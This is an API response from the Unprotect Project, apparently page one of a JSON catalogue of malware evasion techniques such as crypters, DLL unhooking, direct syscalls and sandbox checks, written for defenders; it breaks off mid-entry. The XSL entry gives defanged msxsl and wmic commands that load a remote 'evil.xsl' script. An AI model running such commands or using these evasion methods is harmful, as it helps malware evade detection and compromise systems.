GET /api/techniques/?format=api
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 351,
    "next": "https://unprotect.it/api/techniques/?format=api&page=2",
    "previous": null,
    "results": [
        {
            "id": 370,
            "key": "runtime-function-decryption",
            "unprotect_id": "U0523",
            "name": "Runtime Function Decryption",
            "description": "This technique is used to store the function body in an encrypted form. They will only be decrypted just before the execution of that code and will be re-encrypted after the code has been executed. \r\n\r\nThis technique is used by SmokeLoader to evade anti-virus and EDRs, since the function body is in encrypted form except at the time of execution of the function. It also makes the static analysis of SmokeLoader harder.",
            "resources": "https://irfan-eternal.github.io/understanding-internals-of-smokeloader/#encrypted-function-code",
            "creation_date": "2024-03-22T06:30:48.583023Z",
            "tags": "encryption, smokeloader",
            "modification_date": "2024-03-22T06:30:48.583077Z",
            "category": [
                2
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                37
            ]
        },
        {
            "id": 369,
            "key": "blockinput",
            "unprotect_id": "U1011",
            "name": "BlockInput",
            "description": "As per Microsoft's documentation, `BlockInput` function \"prevents keyboard and mouse input events from reaching applications,\" effectively restricting user interaction with the system. \r\n\r\nMalware occasionally employs this tactic to hinder analysis by debuggers or other analysis tools throughout the process' runtime. To deactivate the block, the program must make a live call to `BlockInput` with the parameter 0. Windows automatically lifts the block when the process ends or the user initiates `Ctrl+Alt+Del`.",
            "resources": "https://malware.news/t/art-of-anti-detection-4-self-defense/32182",
            "creation_date": "2024-03-22T06:24:53.208170Z",
            "tags": "blockinput, keyboard",
            "modification_date": "2024-03-22T06:24:53.208229Z",
            "category": [
                14
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [
                628
            ],
            "contributors": [
                36
            ]
        },
        {
            "id": 368,
            "key": "retrieve-hdd-information",
            "unprotect_id": "U1343",
            "name": "Retrieve HDD Information",
            "description": "Malware can figure out if it's in a virtual environment by checking hard drive info. It looks for specific details like serial and model numbers. This is easier to spot in VirtualBox because it shows clues that it's running in a virtual space. \r\n\r\nMalware uses this trick to avoid getting caught. It does this by using a special command in the DeviceIoControl Win32 API, called IOCTL SMART_RCV_DRIVE_DATA. But, to use this command, you need top-level access.",
            "resources": "https://nicolabottura.github.io/HDDInfo-Evasion-PoC.html",
            "creation_date": "2024-03-20T23:27:16.117731Z",
            "tags": "malware-detection, virtual-environment-evasion, hard-drive-inspection, virtualbox, deviceiocontrol-api, root-privileges, cybersecurity-tactics, evasion-techniques",
            "modification_date": "2024-03-20T23:27:16.117783Z",
            "category": [
                1
            ],
            "rules": [
                157
            ],
            "attachments": [],
            "featured_api": [
                627
            ],
            "contributors": [
                35
            ]
        },
        {
            "id": 367,
            "key": "buildcommdcbandtimeouta",
            "unprotect_id": "U1342, T1497.002",
            "name": "BuildCommDCBAndTimeoutA",
            "description": "This technique uses a `BuildCommDCBAndTimeoutsA` API call to determine if the malware is detonating in a sandbox. Normally, a bogus device string would cause this API call to fail. However, some malware sandbox environments may emulate in a way that allows the API call to succeed even when given a bogus device string.",
            "resources": "",
            "creation_date": "2024-03-20T00:00:50.060144Z",
            "tags": "BuildCommDCBAndTimeoutsA, sandbox evasion",
            "modification_date": "2024-03-20T00:10:09.498989Z",
            "category": [
                1
            ],
            "rules": [
                156
            ],
            "attachments": [],
            "featured_api": [
                626
            ],
            "contributors": [
                34
            ]
        },
        {
            "id": 366,
            "key": "limecrypter",
            "unprotect_id": "U1436",
            "name": "LimeCrypter",
            "description": "Limecrypter is a sophisticated obfuscation tool designed for both native and .NET files. It employs a unique approach to secure payloads by encrypting them within a .NET-based stub. This stub acts as a container for the encrypted payload, ensuring its contents remain concealed until execution.",
            "resources": "https://github.com/NYAN-x-CAT/Lime-Crypter/tree/master\r\nhttps://www.youtube.com/watch?v=TgYb3hwOAV4",
            "creation_date": "2024-01-18T01:13:04.663000Z",
            "tags": "crypter, limecrypter",
            "modification_date": "2024-01-18T01:13:27.449000Z",
            "category": [
                12
            ],
            "rules": [
                155
            ],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                31
            ]
        },
        {
            "id": 365,
            "key": "pyarmor",
            "unprotect_id": "U1435",
            "name": "PyArmor",
            "description": "Pyarmor is a command-line tool primarily used for the obfuscation of Python scripts. While its original design aims to protect Python code from unauthorized access and reverse engineering, its capabilities also make it a tool of interest for malware obfuscation. Pyarmor achieves this through several key features, each with potential applications in both legitimate protection and malicious exploitation:\r\n\r\n- Code Obfuscation: Pyarmor transforms original Python scripts into a form that is significantly more difficult to understand and decompile. This obfuscation process, which alters code structure, names, and other identifiable features while preserving functionality, is a common tactic in malware to conceal harmful operations and evade detection by analysis tools and researchers.\r\n\r\n- Machine Binding: The tool offers the option to bind obfuscated scripts to a specific machine. In legitimate use, this adds security and control over script distribution. In a malware context, this can be misused to target specific victims or to avoid execution in analysis environments, thus evading detection and analysis.\r\n\r\n- Expiration Setting: Pyarmor can set an expiration date for the obfuscated scripts. While beneficial for creating trial software in legitimate scenarios, this feature can be exploited in malware to limit the script's lifespan, making post-infection analysis and reverse engineering more challenging.",
            "resources": "http://pyarmor.dashingsoft.com/\r\nhttps://github.com/dashingsoft/pyarmor",
            "creation_date": "2024-01-18T01:09:12.754000Z",
            "tags": "python, obfuscation",
            "modification_date": "2024-01-18T01:09:12.754000Z",
            "category": [
                12
            ],
            "rules": [
                154
            ],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                2,
                31
            ]
        },
        {
            "id": 364,
            "key": "niximports",
            "unprotect_id": "U1434",
            "name": "NixImports",
            "description": "A .NET malware loader employs API-Hashing and dynamic invocation to circumvent static analysis. NixImports utilizes managed API-Hashing to dynamically determine most of its required functions during runtime. For function resolution, HInvoke needs two specific hashes: typeHash and methodHash, representing the type name and the method's full name, respectively. At runtime, HInvoke scans the entire mscorlib to locate the corresponding type and method. Consequently, HInvoke doesn't generate any import references for the methods accessed through it.\r\n\r\nAdditionally, NixImports is designed to minimize the use of well-known methods. Wherever possible, it opts for internal methods over their standard wrappers. This strategy helps in evading the basic hooks and monitoring systems used by certain security tools.",
            "resources": "https://github.com/dr4k0nia/NixImports/tree/master\r\nhttps://dr4k0nia.github.io/posts/NixImports-a-NET-loader-using-HInvoke/",
            "creation_date": "2024-01-14T07:42:17.781000Z",
            "tags": "NixImports, packer, .net",
            "modification_date": "2024-01-14T07:47:41.089000Z",
            "category": [
                12
            ],
            "rules": [
                148,
                149
            ],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                31,
                33
            ]
        },
        {
            "id": 363,
            "key": "powershell-special-characters-obfuscation",
            "unprotect_id": "U0709",
            "name": "PowerShell Special Characters Obfuscation",
            "description": "PowerShell scripts can be obfuscated using methods that encode commands exclusively with special characters. This technique aims to complicate analysis and potentially evade detection mechanisms. \r\n\r\nAttackers frequently employ these tactics to hide the true functionalities of the script, making the analysis more challenging.",
            "resources": "https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-EncodedSpecialCharOnlyCommand.ps1\r\nhttps://perl-users.jp/articles/advent-calendar/2010/sym/11",
            "creation_date": "2024-01-12T10:26:52.204000Z",
            "tags": "PowerShell, obfuscation",
            "modification_date": "2024-01-12T10:31:41.654000Z",
            "category": [
                7
            ],
            "rules": [
                147
            ],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                32
            ]
        },
        {
            "id": 362,
            "key": "purecrypter",
            "unprotect_id": "U1433",
            "name": "PureCrypter",
            "description": "PureCrypter, a multi-functional crypter/loader developed in C#, was first introduced in hacking forums on March 17, 2021. This tool is compatible with both 32-bit and 64-bit native as well as .NET payloads. It features multiple injection modes, including reflection, RunPE, and shellcode. PureCrypter can deliver payloads either via a URL or offline. It has been noted for its use in conjunction with various RATs and infostealers, such as Remcos, AsyncRAT, Redline Stealer, and Arkei.",
            "resources": "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
            "creation_date": "2024-01-09T23:56:58.234000Z",
            "tags": "PureCrypter, Packer",
            "modification_date": "2024-01-09T23:56:58.234000Z",
            "category": [
                12
            ],
            "rules": [
                143
            ],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                32
            ]
        },
        {
            "id": 361,
            "key": "truecrypt",
            "unprotect_id": "U1432",
            "name": "TrueCrypt",
            "description": "TrueCrypt, a crypter developed and sold by the developers behind Meduza Stealer, which features LoadPE functionality and is written in Golang, supports both native (x32) and .NET binaries. This crypter has been used by Lumma, Vidar, Raccoon, MetaStealer, Redline stealers, and DCRAT.",
            "resources": "https://www.resecurity.com/blog/article/new-version-of-medusa-stealer-released-in-dark-web",
            "creation_date": "2024-01-07T03:34:48.764000Z",
            "tags": "truecrypt, packer",
            "modification_date": "2024-01-07T03:34:48.764000Z",
            "category": [
                12
            ],
            "rules": [
                141
            ],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                32
            ]
        },
        {
            "id": 360,
            "key": "easycrypter",
            "unprotect_id": "U1431",
            "name": "EasyCrypter",
            "description": "EasyCrypter is the crypter that is being sold via an automated bot on Telegram. The crypter uses a method known as \"mutation\", which involves replacing instructions in the file with their analogues or a sequence of instructions that yield the same outcome as the original code. EasyCrypter supports a maximum file size of 5MB and is only applicable for x86 .NET/Native files.",
            "resources": "https://teletype.in/@dinerosell/EasyCrypterFAQ_RU",
            "creation_date": "2024-01-05T22:18:00.904000Z",
            "tags": "packers, easycrypter",
            "modification_date": "2024-01-05T22:18:00.904000Z",
            "category": [
                12
            ],
            "rules": [
                139
            ],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                32
            ]
        },
        {
            "id": 359,
            "key": "funcin",
            "unprotect_id": "U0132,U0221,U0308",
            "name": "FuncIn",
            "description": "FuncIn involves a payload staging strategy wherein the entire set of malicious functionalities is not contained within the malware file itself or any third-party file/network location (e.g., a web server). Instead, these functionalities are transmitted over the network by the Command and Control (C2) server when required.\r\n\r\nThis approach addresses three primary issues in malware development. Firstly, it mitigates the size of the malware, as most functionalities are not directly embedded in the malware. Functioning as a network loader, the malware can be very compact (often just a few kilobytes). Secondly, it tackles the challenges posed by malware analysis and detection. The absence of most malicious functionalities physically within the malware or its immediate dependencies can make reverse engineering and detection more challenging. For instance, if the malware loader expects specific characteristics to be met before transmitting the rest of the payload (e.g., geographic location, system requirements, certain user or host machine behaviour, and properties), analysis becomes difficult until the complete payload is downloaded. Lastly, it addresses maintenance concerns. The majority of the code residing on the C2 side makes maintenance more convenient. Malicious actors do not need to update the remote loader but only the shellcodes (functionalities) located on the C2, transmitted when needed. \r\n\r\nOne notable example of malware leveraging the FuncIn technique is PoisonIvy RAT, a famous Remote Access Trojan. Despite its compact size, typically less than 8 kilobytes, PoisonIvy RAT incorporated a wide range of expected functions for a RAT, including webcam capture, screen capture, password enumeration, system management, and file management etc..\r\n\r\nThe author of PoisonIvy RAT employed an approach of using precompiled pieces of code (shellcodes). However, with the advent of more modern tools, it is now easily feasible to compile the shellcodes just in time (JIT) before sending them to the loader. This JIT compilation enhances the adaptability and sophistication of the malware, allowing it to dynamically adjust its functionalities based on specific criteria.\r\n\r\nUnlike classic PIC , shellcodes commonly used in binary exploitation, FuncIn doesn't rely on library loading or API hashing mechanisms (at least, it don’t need to, except for additional evasion mechanisms) directly within the shellcode. Instead, these tasks are delegated to the loader, which then transmits essential information to the Command and Control (C2) server for shellcode JIT compilation or patching.\r\n\r\nAnother alternative to the FuncIn technique is loading malware functionalities through extra DLL files that are reflected to avoid being written to disk, minimising physical evidence. This approach relies on DLLs rather than shellcode, offering several advantages. In addition to supporting any high-level programming language for coding extra features, using DLLs makes it easier to maintain and extend the malware's capabilities.\r\n\r\nHowever, it's important to note that while relying on DLLs provides advantages in terms of ease of maintenance, extensibility, and language support, it may be less optimised and stealthy compared to the approach of utilising small, fully controlled pieces of code that the malware author has mastered. The choice between these techniques often involves trade-offs, considering factors such as the specific goals of the malware, the targeted systems, and the overall strategy of the threat actor.\r\n\r\nAttached to this description, you will discover a comprehensive project showcasing the FuncIn Evasion Technique, implemented with the assistance of the [Keystone Engine](https://www.keystone-engine.org). This project is designed to expand, incorporating additional examples in various programming languages. Given that the majority of the functionality resides in the shellcode, the choice of programming language for the loader is not highly restrictive. It's essential to note that the loader is typically compact and straightforward, tasked with loading and executing pieces of code within its process space.",
            "resources": "https://github.com/Unprotect-Project/FuncInEvasionTechniqueDemo/tree/main",
            "creation_date": "2023-12-13T16:08:17.059000Z",
            "tags": "Shellcode, FuncIn, Plugins, Reflection, DLL, JIT",
            "modification_date": "2023-12-13T16:37:18.308000Z",
            "category": [
                2,
                3,
                5,
                8
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [
                2,
                3,
                4,
                5
            ],
            "contributors": [
                1
            ]
        },
        {
            "id": 358,
            "key": "process-argument-spoofing",
            "unprotect_id": "U1243",
            "name": "Process Argument Spoofing",
            "description": "Process Argument Spoofing is a technique used by attackers to hide their true intentions by changing the command line arguments of a process after it has started. This is done by tampering with the Process Environment Block (PEB).\r\n\r\nThe PEB is a structure in Windows that holds various information about a running process. Within the PEB, there's a specific section called `RTL_USER_PROCESS_PARAMETERS`. This section contains an attribute named CommandLine, which is structured as a `UNICODE_STRING`. The CommandLine attribute is crucial because it stores the command line arguments that were used to start the process.\r\n\r\nAttackers exploit this by modifying the CommandLine attribute's buffer. When they change the contents of this buffer, the command line arguments that are visible to monitoring tools and security analysts are altered. This means that even if a process was started with malicious intentions, the attackers can overwrite these initial arguments with harmless-looking ones. As a result, the process can appear legitimate to security systems and analysts, and potentially hiding the malicious activity.\r\n\r\nThe sophistication of Process Argument Spoofing lies in its ability to alter process information after the process has been created and initially inspected by security tools, making it a bit more challenging to detect.",
            "resources": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/\r\nhttps://www.bordergate.co.uk/argument-spoofing/",
            "creation_date": "2023-12-12T05:13:02.378000Z",
            "tags": "Process Argument Spoofing, PEB Manipulation, Command Line Argument Tampering, Low-Level System Manipulation,",
            "modification_date": "2023-12-13T06:09:46.828000Z",
            "category": [
                4
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [
                6,
                357,
                625
            ],
            "contributors": [
                29
            ]
        },
        {
            "id": 357,
            "key": "smb-named-pipes",
            "unprotect_id": "U9011",
            "name": "SMB / Named Pipes",
            "description": "Named Pipes are a feature of the Windows operating system that allow for inter-process communication (IPC) using a pipe metaphor. These are particularly useful in networking scenarios as they can be made accessible over a network and facilitate a client-server model of communication. The SMB (Server Message Block) protocol is commonly used in Windows environments for shared access to files, printers, and other network services.\r\n\r\nWhen malware uses Named Pipes over the SMB protocol for network evasion, it is essentially wrapping its communication in layers of legitimate-looking traffic. Named Pipes can be set up to pass data packets that may appear harmless or even normal to network monitoring tools. This makes detection harder because the malicious traffic is mixed with regular, authorized network activity.",
            "resources": "https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes?WT_mc_id=SEC-MVP-5005282\nhttps://learn.microsoft.com/en-us/dotnet/standard/io/pipe-operations?WT_mc_id=SEC-MVP-5005282\nhttps://github.com/DarkCoderSc/SharpShellPipe",
            "creation_date": "2023-08-27T16:55:16.842000Z",
            "tags": "Named Pipes, SMB, Network, Pivot, Evasion",
            "modification_date": "2023-10-04T10:44:36.278000Z",
            "category": [
                9
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [
                23,
                380,
                450,
                620,
                621,
                622,
                623,
                624
            ],
            "contributors": [
                1
            ]
        },
        {
            "id": 356,
            "key": "right-to-left-override-rlo-extension-spoofing",
            "unprotect_id": "U1010",
            "name": "Right-to-Left Override (RLO) Extension Spoofing",
            "description": "The **Right-to-Left Override** (RLO) character (`U+202E`) is a Unicode control character used for bidirectional text formatting. It affects the way text is displayed, causing text following the RLO character to be rendered from right to left, which is typically used in languages like Arabic and Hebrew.\r\n\r\nHowever, malicious actors have found a way to exploit this Unicode character to deceive users by using it in file extensions. By strategically placing the RLO character within a file name, they can manipulate the visual appearance of the extension while maintaining its actual content.\r\n\r\nFor example, consider a file named \"invoice.pdf\" with the RLO character followed by malicious code: `invoice\\u202Efdp.exe`. When displayed in certain contexts, it may appear as `invoiceexe.pdf` (hiding the \".exe\" extension) instead of the actual \"invoice.pdf.exe\". This tactic aims to trick users into believing the file is harmless when, in reality, it could be a dangerous executable.",
            "resources": "",
            "creation_date": "2023-08-03T06:17:48.602000Z",
            "tags": "Extension, Spoof, RLO, Filename",
            "modification_date": "2024-01-15T00:01:09.968000Z",
            "category": [
                14
            ],
            "rules": [
                151
            ],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                1,
                31
            ]
        },
        {
            "id": 355,
            "key": "dll-unhooking",
            "unprotect_id": "U0522",
            "name": "DLL Unhooking",
            "description": "Endpoint Detection and Response (EDR) tools use a technique known as hooking to monitor sensitive system functions within the DLLs of loaded processes. Hooking is a method of live-patching system DLLs, enabling EDRs to intercept the flow of a program and evaluate its legitimacy.\r\n\r\nHere's how it works: EDRs modify the first instructions of the functions within the DLLs. When these functions are called, the program's execution flow is diverted to the EDR's code (housed within a DLL loaded by the EDR in the program). In this redirected state, the EDR can inspect the function's arguments to determine whether their usage is legitimate or potentially malicious. If the usage is deemed legitimate, the EDR restores the program's execution flow, allowing the function to proceed as normal.\r\n\r\nHowever, to evade detection by an EDR, malware can employ a method known as \"unhooking.\" This process involves restoring the entire DLL code section (.text) to its original state. To accomplish this, malware needs access to an unmodified (unhooked) DLL, which it can acquire in several ways: \r\n\r\n1 - directly from the system, which can potentially be detected via an open handle; \r\n\r\n2 - by opening a remote file, which requires the malware author to host a DLL matching the OS version of the target system remotely;\r\n\r\n3 - by initiating a suspended process and retrieving the content of its DLL before it gets hooked.\r\n\r\nTypically, the DLL most commonly hooked/unhooked is NTDLL.dll, as it is the closest to the kernel. However, some EDRs may also hook APIs contained in higher-level DLLs, such as kernel32.dll or user32.dll.",
            "resources": "https://github.com/optiv/Freeze\nhttps://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++",
            "creation_date": "2023-07-03T23:56:46.302000Z",
            "tags": "",
            "modification_date": "2023-10-04T10:43:56.825000Z",
            "category": [
                2
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                28
            ]
        },
        {
            "id": 354,
            "key": "shikata-ga-nai-sgn",
            "unprotect_id": "U0708",
            "name": "Shikata Ga Nai (SGN)",
            "description": "Shikata Ga Nai (SGN) is a data obfuscation technique that employs a polymorphic binary encoding scheme. It was initially developed by Ege Balci and gained popularity through its implementation in Metasploit Framework's msfvenom. SGN takes a binary input and generates a self-decoding obfuscated shellcode. The algorithm utilizes a XOR feedback loop for encoding and prefixes a decoding routine to the payload. Additional garbage instructions are added to enhance obfuscation and make the payload highly resistant to static heuristic analysis. The resulting blob can be executed from the first instruction, which will decode and run the original binary payload. It's important to note that the SGN-encoded shellcode requires a RWX (Read-Write-Execute) protected memory space for proper execution.",
            "resources": "https://github.com/EgeBalci/sgn\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb\nhttps://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong",
            "creation_date": "2023-07-03T23:47:32.505000Z",
            "tags": "Shikata Ga Nai (SGN), data obfuscation, polymorphic binary encoding scheme, Ege Balci, msfvenom, self-decoding obfuscated shellcode, XOR feedback loop",
            "modification_date": "2023-10-04T10:44:32.987000Z",
            "category": [
                7
            ],
            "rules": [
                134
            ],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                28
            ]
        },
        {
            "id": 353,
            "key": "c2-via-ftps",
            "unprotect_id": "U0910",
            "name": "C2 via FTP(S)",
            "description": "C2 via FTP is a technique that utilizes the File Transfer Protocol (FTP) to establish command and control communication between an attacker and victim systems. It involves sending commands and receiving responses within FTP sessions, effectively using FTP as a conduit for covert communication.\r\n\r\nTo implement C2 via FTP, an attacker needs control over an FTP server, and must establish a connection to a compromised system that has access to an external network. The victim’s system must be capable of initiating FTP sessions with the attacker's server. Additionally, the attacker could employ various means of obfuscation to make the traffic appear innocuous and blend in with legitimate FTP traffic.\r\n\r\nC2 via FTP can serve diverse objectives, such as remotely executing commands, managing malware, or orchestrating multistage attacks. Detecting C2 via FTP can be challenging, as FTP is a widely-used protocol for legitimate file transfers, and the malicious traffic may not raise alarms in a network’s security monitoring systems. Moreover, if FTPS (FTP Secure) is used, the data is encrypted, adding an additional layer of complexity to detection.",
            "resources": "https://github.com/DarkCoderSc/SharpFtpC2",
            "creation_date": "2023-06-12T08:10:43.726000Z",
            "tags": "C2, FTP, FTPS, File",
            "modification_date": "2023-10-04T10:44:31.505000Z",
            "category": [
                9
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [
                23,
                25,
                290,
                380,
                381,
                383,
                450,
                452,
                459,
                485,
                603,
                604,
                605,
                606,
                607,
                608,
                609,
                610,
                611,
                612,
                613,
                614,
                615,
                616,
                617,
                618,
                619
            ],
            "contributors": [
                1
            ]
        },
        {
            "id": 352,
            "key": "evasion-using-direct-syscalls",
            "unprotect_id": "U0521",
            "name": "Evasion using direct Syscalls",
            "description": "In the Windows operating system, conventional malware frequently utilizes strategies involving the invocation of specific functions from the kernel32.dll library, such as `VirtualAlloc`, `VirtualProtect`, and `CreateThread`. A closer inspection of the call stack reveals that the functions employed from kernel32.dll eventually trigger corresponding functions within the ntdll.dll library. This is facilitated by the ntdll.dll library, which serves as the gateway to the Windows kernel, executing this transition via system calls (syscalls). Hence, any function invoked from kernel32.dll will subsequently prompt one or more associated functions within ntdll.dll. To illustrate, the `VirtualProtect` function from kernel32.dll corresponds to the `NtProtectVirtualMemory` function in ntdll.dll.\r\n\r\nEndpoint Detection and Response (EDR) and Antivirus (AV) systems generally hook onto the ntdll.dll, but only for a handful of crucial functions often exploited by malware. These systems actively monitor potentially exploitable behavior.\r\n\r\nThis technique can also be used for sandbox evasion. Some sandboxes log only higher-level WinAPI or NT API calls, but do not monitor or hook syscalls (or sysenters). Sandboxes that are missing these events will not see these calls. To combat this technique, ensure your sandboxes are able to log/hook syscalls and kernel function calls.\r\n\r\n## Unique Aspects of This Technique\r\nThe distinctiveness of this technique lies in its ability to invoke direct syscalls using assembly without calling upon any kernel32 or ntdll functions. It also bypasses the implementation of createthread by directly jumping to a custom heap variable, altering its protection, and finally returning for a clean exit - all without the need to allocate memory, change protection, and copy the payload to the new memory location.\r\n\r\nAnother intriguing aspect is the flexibility in naming the extern functions. These functions need not necessarily be called `VirtualProtect` or `VirtualAlloc`. They can have any arbitrary name of your choice, which enhances the complexity of analysis, particularly when disassembled. For instance, it could be named `myCustomDontProtect`, or even something obscure like `rYTBbmNPTDoscUV`.\r\n\r\n## Operational Mechanism\r\nThe main function initiates by setting up markers using inline assembly and then calls an extern function to unprotect the heap variable location containing the executable payload (in this instance, 'calc'). This extern function is converted into assembly code that triggers the syscall. Subsequently, the main function conserves the registers and prompts payload execution via another extern function. This function, in turn, translates to a \"jmp\" instruction that directs execution to the heap location, executing the payload. The payload contains instructions to return via another \"jmp\" instruction. The return location is preserved in the R15 register using inline assembly in the main function. Post return to the main function, the registers are restored, and the program gracefully terminates.",
            "resources": "https://medium.com/@merasor07/av-edr-evasion-using-direct-system-calls-user-mode-vs-kernel-mode-fad2fdfed01a\r\nhttps://github.com/ghostpepper108/Evasion",
            "creation_date": "2023-05-18T23:39:48.016000Z",
            "tags": "Kernel32.dll, VirtualAlloc, VirtualProtect, CreateThread, Call stack, Ntdll.dll, Syscall, NtProtectVirtualMemory, EDRs/AVs, Hook onto ntdll.dll, Direct syscalls, Assembly, Heap variable",
            "modification_date": "2024-01-14T23:57:50.362000Z",
            "category": [
                2
            ],
            "rules": [
                150
            ],
            "attachments": [],
            "featured_api": [
                419
            ],
            "contributors": [
                8,
                26,
                31
            ]
        },
        {
            "id": 351,
            "key": "hells-gate",
            "unprotect_id": "U0520",
            "name": "Hell's Gate",
            "description": "The Hell's Gate technique refers to a specific method used by malware authors to make their software more difficult to detect and analyze. The technique involves the use of a custom native API resolver to resolve Windows API functions at runtime dynamically.\r\n\r\nBy using Hell's Gate, malware can avoid referencing the Windows API functions directly in the Import Address Table (IAT). This makes it harder for security analysts and automated tools to identify and trace the malware's behavior. The technique essentially hides the malware's intentions by obfuscating the API calls it uses to perform its malicious activities.\r\n\r\nThe Hell's Gate malware technique is a method used by malware authors to dynamically resolve Windows API functions at runtime, making the malware more difficult to analyze and detect. It achieves this by bypassing the conventional method of statically linking API functions in the Import Address Table.",
            "resources": "https://teamhydra.blog/2020/09/18/implementing-direct-syscalls-using-hells-gate/\nhttps://rioasmara.com/2022/03/09/hellgate-technique-on-av-bypass/",
            "creation_date": "2023-04-02T03:05:42.415000Z",
            "tags": "hellsgate, AV bypass, IAT, Obfuscation",
            "modification_date": "2023-10-04T10:44:54.981000Z",
            "category": [
                2
            ],
            "rules": [],
            "attachments": [
                "fbcc6ce5-437d-4b87-ab51-a753f404e104"
            ],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 350,
            "key": "xsl-script-processing",
            "unprotect_id": "T1220",
            "name": "XSL Script Processing",
            "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. \r\n\r\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.\r\n\r\nCommand-line examples:\r\n\r\nmsxsl.exe customers[.]xml script[.]xsl\r\nmsxsl.exe script[.]xsl script[.]xsl\r\nmsxsl.exe script[.]jpeg script[.]jpeg\r\nAnother variation of this technique, dubbed \"Squiblytwo\", involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file. This technique can also execute local/remote scripts and, similar to its Regsvr32/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.\r\nCommand-line examples:\r\n\r\nLocal File: wmic process list /FORMAT:evil[.]xsl\r\nRemote File: wmic os get /FORMAT:\"https[:]//example[.]com/evil[.]xsl\"",
            "resources": "https://attack.mitre.org/techniques/T1220/",
            "creation_date": "2023-03-21T00:00:35.711000Z",
            "tags": "Defense Evasion,\r\nbypass application control,\r\nExtensible Stylesheet Language (XSL),\r\nexecute arbitrary files,\r\nMicrosoft common line transformation utility binary (msxsl.exe),\r\nexecute malicious embedded JavaScript,\r\nXSL files,\r\nSquiblytwo,\r\nWindows Management Instrumentation,\r\n/FORMAT,",
            "modification_date": "2023-10-04T10:44:30.142000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 349,
            "key": "virtualizationsandbox-evasion-time-based-evasion",
            "unprotect_id": "T1497.003",
            "name": "Virtualization/Sandbox Evasion: Time Based Evasion",
            "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\r\n\r\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: Scheduled Task/Job). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled Multi-Stage Channels to avoid analysis and scrutiny.\r\n\r\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as Pings, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments. Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).\r\n\r\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.",
            "resources": "https://attack.mitre.org/techniques/T1497/003/",
            "creation_date": "2023-03-20T23:56:48.796000Z",
            "tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME),\r\nsandbox,\r\ndelaying malware functionality,\r\nsleep commands,\r\nnative system scheduling functionality,\r\nevent based triggers,\r\nscheduled Multi-Stage Channels,\r\nAPI hammering,\r\ntimestamp sampling,",
            "modification_date": "2023-10-04T10:43:59.645000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 348,
            "key": "virtualizationsandbox-evasion-user-activity-based-checks",
            "unprotect_id": "T1497.002",
            "name": "Virtualization/Sandbox Evasion: User Activity Based Checks",
            "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.\r\n\r\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks, browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro or waiting for a user to double click on an embedded image to activate",
            "resources": "https://attack.mitre.org/techniques/T1497/002/",
            "creation_date": "2023-03-20T23:53:34.833000Z",
